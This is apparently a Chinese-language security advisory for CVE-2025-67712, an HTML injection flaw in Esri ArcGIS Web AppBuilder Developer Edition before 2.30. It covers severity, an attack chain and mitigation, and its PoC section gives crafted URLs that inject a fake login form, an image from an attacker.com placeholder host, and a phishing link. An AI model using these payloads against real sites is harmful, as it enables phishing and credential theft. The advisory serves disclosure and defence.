CVE-2025-67712: Esri ArcGIS Web AppBuilder HTML注入漏洞

漏洞信息

漏洞编号

CVE-2025-67712

漏洞类型

HTML注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Esri ArcGIS Web AppBuilder Developer Edition

漏洞概述

CVE-2025-67712是Esri ArcGIS Web AppBuilder开发者版中的一个HTML注入漏洞。该漏洞影响2.30版本之前的所有版本，CVSS评分4.7，属于中等严重程度。漏洞允许未经身份验证的远程攻击者通过诱使受害者点击恶意链接，在受害者浏览器中渲染任意HTML内容。值得注意的是，目前没有证据表明该漏洞可以实现JavaScript执行，这在一定程度上限制了其潜在影响范围和危害程度。ArcGIS Web AppBuilder是Esri公司开发的一款可视化开发工具，允许用户无需编写代码即可创建Web地图应用程序。该产品已于提交漏洞时（2025年12月19日）正式停用并停止支持。版本2.30已修复此漏洞，不再受此问题影响。由于产品已停用，建议用户尽快迁移到替代解决方案或应用最新安全更新。

技术细节

HTML注入漏洞（也称为折射型XSS）发生在应用程序未能正确验证和清理用户输入的情况下。在Esri ArcGIS Web AppBuilder Developer Edition中，攻击者可以通过构造包含恶意HTML标签的URL参数或表单数据，当受害者访问该链接时，服务器将未经过滤的用户输入直接嵌入到响应页面中。攻击者可以利用此漏洞注入任意HTML内容，包括伪造登录表单、插入恶意图片、修改页面布局或嵌入钓鱼内容。虽然该漏洞不允许JavaScript执行（因为输入被作为纯HTML处理而非脚本），但仍可用于网络钓鱼攻击、传播虚假信息或诱导用户泄露敏感信息。攻击成功的关键在于诱使受害者点击攻击者精心构造的链接，这通常通过社会工程学手段实现，如在电子邮件或即时消息中发送看似可信的链接。

攻击链分析

STEP 1

Reconnaissance

攻击者识别运行Esri ArcGIS Web AppBuilder Developer Edition且版本低于2.30的目标实例

STEP 2

Payload Crafting

攻击者构造包含恶意HTML标签的注入载荷，如钓鱼表单、图片标签或伪装链接

STEP 3

Social Engineering

攻击者通过钓鱼邮件、即时消息或其他渠道向目标用户发送包含恶意链接的消息

STEP 4

User Interaction

受害者点击攻击者提供的恶意链接，浏览器向目标服务器发起请求

STEP 5

Injection Execution

服务器将未经过滤的用户输入直接嵌入到响应HTML中并返回给受害者浏览器

STEP 6

Impact Realization

受害者浏览器渲染恶意HTML内容，可能被诱骗泄露敏感信息或执行非预期操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- HTML Injection PoC for CVE-2025-67712 -->
<!-- Attacker crafts a malicious URL with HTML injection payload -->

<!-- Example 1: Basic HTML injection via URL parameter -->
<a href="http://target-arcgis-server/webappbuilder/?param=<h1>Hacked</h1><p>Your session has expired. Please login again:</p><form><input type='text' placeholder='Username'><input type='password' placeholder='Password'><button>Login</button></form>">Click here to access the map</a>

<!-- Example 2: Image injection to deface page -->
<a href="http://target-arcgis-server//webappbuilder/?returnUrl=<img src='https://attacker.com/malicious-banner.png' width='100%'/>">View Application</a>

<!-- Example 3: Link injection to redirect users -->
<a href="http://target-arcgis-server/webappbuilder/?redirect=<a href='https://attacker- phishing-site.com'>Click here for special offer</a>">Open Map</a>

<!-- Attack scenario: -->
<!-- 1. Attacker identifies vulnerable ArcGIS Web AppBuilder instance -->
<!-- 2. Attacker crafts HTML injection payload -->
<!-- 3. Attacker sends phishing email with malicious link -->
<!-- 4. Victim clicks link and views rendered HTML in browser -->
<!-- 5. Victim may be tricked into entering credentials or trusting fake content -->

影响范围

Esri ArcGIS Web AppBuilder Developer Edition < 2.30

防御指南

临时缓解措施

由于ArcGIS Web AppBuilder Developer Edition已正式停用且不再受官方支持，建议用户立即停止使用受影响版本，尽快迁移到ArcGIS Experience Builder或其他受支持的ArcGIS平台产品。对于无法立即迁移的环境，可通过在Web应用前端部署WAF（Web应用防火墙）规则来过滤恶意HTML内容，同时对用户进行安全意识培训以防范社会工程攻击。